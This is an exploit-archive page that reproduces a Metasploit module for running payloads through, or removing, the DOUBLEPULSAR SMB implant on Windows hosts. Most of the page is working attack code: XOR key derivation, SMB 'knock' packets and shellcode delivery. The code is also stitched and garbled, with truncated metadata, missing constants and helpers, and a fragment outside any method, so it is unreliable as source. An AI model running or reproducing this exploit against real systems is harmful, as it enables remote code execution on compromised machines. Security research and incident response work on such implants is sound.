Doublepulsar payload execution and neutralization (metasploit) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-10-02 |
Type : remote |
Platform : windows
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB::Client
MAX_SHELLCODE_SIZE = 4096
def initialize(info = {})
super(update_info(info,
'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',
'Description' => %q{
This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.
def calculate_doublepulsar_status(m1, m2)
STATUS_CODES.key(m2.to_i - m1.to_i)
end
# algorithm to calculate the XOR Key for DoublePulsar knocks
def calculate_doublepulsar_xor_key(s)
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
x & 0xffffffff # this line was added just to truncate to 32 bits
end
# The arch is adjacent to the XOR key in the SMB signature
def calculate_doublepulsar_arch(s)
s == 0 ? ARCH_X86 : ARCH_X64
end
def generate_doublepulsar_timeout(op)
k = SecureRandom.random_bytes(4).unpack('V').first
0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
end
def generate_doublepulsar_param(op, body)
case OPCODES.key(op)
when :ping, :kill
"\x00" * 12
when :exec
Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))
end
end
def check
ipc_share = "\\\\#{rhost}\\IPC$"
@tree_id = do_smb_setup_tree(ipc_share)
vprint_good("Connected to #{ipc_share} with TID = #{@tree_id}")
vprint_status("Target OS is #{smb_peer_os}")
vprint_status('Sending ping to DOUBLEPULSAR')
code, signature1, signature2 = do_smb_doublepulsar_pkt
msg = 'Host is likely INFECTED with DoublePulsar!'
case calculate_doublepulsar_status(@multiplex_id, code)
when :success
@xor_key = calculate_doublepulsar_xor_key(signature1)
@arch = calculate_doublepulsar_arch(signature2)
arch_str =
case @arch
when ARCH_X86
'x86 (32-bit)'
when ARCH_X64
'x64 (64-bit)'
end
vprint_good("#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}")
CheckCode::Vulnerable
when :not_detected
vprint_error('DOUBLEPULSAR not detected or disabled')
CheckCode::Safe
else
vprint_error('An unknown error occurred')
CheckCode::Unknown
end
end
def exploit
if datastore['DefangedMode']
warning = <<~EOF
Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.
Disable the DefangedMode option if you have authorization to proceed.
EOF
fail_with(Failure::BadConfig, warning)
end
# No ForceExploit because @tree_id and @xor_key are required
unless check == CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')
end
case target.name
when 'Execute payload'
unless @xor_key
fail_with(Failure::NotFound, 'XOR key not found')
end
if @arch == ARCH_X86
fail_with(Failure::NoTarget, 'x86 is not a supported target')
end
print_status("Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}")
xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)
print_status('Sending shellcode to DOUBLEPULSAR')
code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)
when 'Neutralize implant'
return neutralize_implant
end
case calculate_doublepulsar_status(@multiplex_id, code)
when :success
print_good('Payload execution successful')
when :invalid_params
fail_with(Failure::BadConfig, 'Invalid parameters were specified')
when :alloc_failure
fail_with(Failure::PayloadFailed, 'An allocation failure occurred')
else
fail_with(Failure::Unknown, 'An unknown error occurred')
end
ensure
disconnect
end
case calculate_doublepulsar_status(@multiplex_id, code)
when :success
print_good('Implant neutralization successful')
else
fail_with(Failure::Unknown, 'An unknown error occurred')
end
end
def do_smb_setup_tree(ipc_share)
connect
# logon as user \
simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])
# connect to IPC$
simple.connect(ipc_share)
# return tree
simple.shares[ipc_share]
end
def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)
# make doublepulsar knock
pkt = make_smb_trans2_doublepulsar(opcode, body)
sock.put(pkt)
bytes = sock.get_once
return unless bytes
# convert packet to response struct
pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct
pkt.from_s(bytes[4..-1])
return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']
end